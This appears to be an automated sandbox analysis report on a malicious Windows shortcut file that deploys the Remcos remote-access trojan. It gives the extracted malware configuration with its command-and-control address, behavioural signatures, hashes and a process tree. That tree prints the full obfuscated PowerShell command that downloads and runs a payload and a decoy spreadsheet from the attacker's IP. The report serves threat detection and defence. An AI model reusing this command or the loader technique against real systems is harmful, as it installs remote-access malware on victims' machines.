Analysis
-
max time kernel
149s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
31-08-2024 02:03
Static task
static1
Behavioral task
behavioral1
Sample
ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03.lnk
Resource
win7-20240729-en
General
-
Target
ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03.lnk
-
Size
32KB
-
MD5
0ea3d54cecf6ea4d5e6739ffe9ce4be4
-
SHA1
513dca9cb690972319181c4f31ac98dcd80ea895
-
SHA256
ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03
-
SHA512
33826667e53d5cdb60ccfeb84a309059e20ce5da79d7dde853578fcea99b44d2a92debe4d6da65f463223b48d1b9f510bb0c9c3b26e7fb0b2a5199eb6ead45d2
-
SSDEEP
48:88muavUQSSesYOhI3YMEDo/i1xCoXEEDDo/L8A7NZdCZFXuGdZTa7x:88y8EesYeI3hX+xCRZR4uKQ
Malware Config
Extracted
remcos
feetfuck
83.222.191.201:24251
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XTJ1YO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 3188 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 1420 Newfts.exe 3720 Newfts.exe -
Loads dropped DLL 8 IoCs
pid Process 1420 Newfts.exe 1420 Newfts.exe 1420 Newfts.exe 1420 Newfts.exe 3720 Newfts.exe 3720 Newfts.exe 3720 Newfts.exe 3720 Newfts.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3720 set thread context of 4804 3720 Newfts.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2144 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3188 powershell.exe 3188 powershell.exe 1420 Newfts.exe 3720 Newfts.exe 3720 Newfts.exe 4804 cmd.exe 4804 cmd.exe 4804 cmd.exe 4804 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3720 Newfts.exe 4804 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3188 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE 2144 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4100 wrote to memory of 3188 4100 cmd.exe 84 PID 4100 wrote to memory of 3188 4100 cmd.exe 84 PID 3188 wrote to memory of 1420 3188 powershell.exe 92 PID 3188 wrote to memory of 1420 3188 powershell.exe 92 PID 3188 wrote to memory of 1420 3188 powershell.exe 92 PID 3188 wrote to memory of 2144 3188 powershell.exe 93 PID 3188 wrote to memory of 2144 3188 powershell.exe 93 PID 3188 wrote to memory of 2144 3188 powershell.exe 93 PID 1420 wrote to memory of 3720 1420 Newfts.exe 94 PID 1420 wrote to memory of 3720 1420 Newfts.exe 94 PID 1420 wrote to memory of 3720 1420 Newfts.exe 94 PID 3720 wrote to memory of 4804 3720 Newfts.exe 96 PID 3720 wrote to memory of 4804 3720 Newfts.exe 96 PID 3720 wrote to memory of 4804 3720 Newfts.exe 96 PID 2144 wrote to memory of 3008 2144 EXCEL.EXE 99 PID 2144 wrote to memory of 3008 2144 EXCEL.EXE 99 PID 3720 wrote to memory of 4804 3720 Newfts.exe 96 PID 4804 wrote to memory of 1884 4804 cmd.exe 109 PID 4804 wrote to memory of 1884 4804 cmd.exe 109 PID 4804 wrote to memory of 1884 4804 cmd.exe 109 PID 4804 wrote to memory of 1884 4804 cmd.exe 109 PID 4804 wrote to memory of 1884 4804 cmd.exe 109
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo TeuldrVGQbKMoxomeUoWOqhwvLOxvRa; echo kHymKfRwuZXnxCZJgAfmykUgOsaYlqvqidzuAVdr; echo BzhKUakeDaTwVhpLOdFPPdFVoZgkSjggfDEAGyfrfJLDRccpyaIWIA; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo kUBgvnjkEnVVtBTakWaQxmlPinKUrVTnqYKyBiuNzxKhEEivsinzTrJtp; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo KXIRBZFhgPOZEKacAcLhfiuehKFFEsRDolDsCVbHJSxXKtveGjGXJJi; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo QnvQaCnoZGPZHtQIYplmH; s''t''a''rt rv_luti_2024_roku.xlsx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exeC:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:1884
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵PID:3008
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:3156
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD565070f83ded408888e3532a1c33649b3
SHA11ba2b8930471b53cda7070348d960adcb1a43b1f
SHA256c4c91212ad12c2aab610970cffe95ae2ca3812951ae2e5140476383c3bec9402
SHA512a8838b1911265f0e38631155c9a56125b65da2fbd65dffd94641f05ee8033e223d20332f5897b3df634708956f50d5122c23ee4f8b431e768b80dc23d748a74a
-
Filesize
265B
MD5915c011de72320514716f08acc6a4b19
SHA11bc1ef8fc446bbc3c5dadeddae27283ef4b16fad
SHA256d3f8f1f91eb7cf9deac26f635b2e24b1f6a855d64c3fff735cc0edffa246399e
SHA512188bb1d877c56446baec396c539ef00df433861a8ff755eef48f5e92944f421c8ac07cee8cbcf40852a7ebafc5c33ba24a3fffff4adacb4afa2057f9a4924edf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize2KB
MD5b0a17aa56a1944f2c9ad84b53b9398d7
SHA13a4b1642d1aa6fda6d735a6dc25d2dc1bf09122c
SHA2568bfc3ef95930644e54f56db57f78d51c9ea46fcbbc2cfaadf35a5b499d442a51
SHA5128d8c277dab8764bc8cb34763284bdf08de9b5b47349c1793e22fba5c2aaca3f85982f87488eca8ec7a376973bce9236526ca8b8e25a344f62cf5949f9f35c335
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5f2a2023076d9c41eefc0aa87c6611792
SHA134168833e81a25c71f8454700584ef0d8eff463b
SHA256499819a8d3691e7751aced352b2d71f87020189b67d542f207f1dabd93684621
SHA512f7c4c40ec2223adc3785ef300de9ba02b5646f7cc06beb0947b288384093fb658a1065ad4d438e3abe7efe83e65f831c27e9c886ce1e4e76257a65a7ba4f649a
-
Filesize
2.1MB
MD5db7e67835fce6cf9889f0f68ca9c29a9
SHA15565afda37006a66f0e4546105be60bbe7970616
SHA256dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738
SHA512bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b
-
Filesize
1.1MB
MD559c15c71fd599ff745a862d0b8932919
SHA18384f88b4cac4694cf510ca0d3f867fd83cc9e18
SHA256c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2
SHA512be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e
-
Filesize
1.4MB
MD56fdb2e9ca6b7a5ad510e2b29831e3bc8
SHA14a14ee9d5660eb271a6b5f18a55ac3e05f952c68
SHA256f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38
SHA512d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06
-
Filesize
31KB
MD55dc69a3e2fda6cb740f363ef77edcc13
SHA1c177fabf17346531e07d562be11915bf2822148a
SHA2567c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621
SHA512b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f
-
Filesize
1.0MB
MD5471076308d78944d45ab35d37134134a
SHA105cf2cf6e5d11ce10425b14d68cda3246cc47263
SHA25638d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b
SHA5127f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3
-
Filesize
32KB
MD521046015d5d9ef5e536ac7643b1ab365
SHA1f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05
SHA2567a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd
SHA512d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e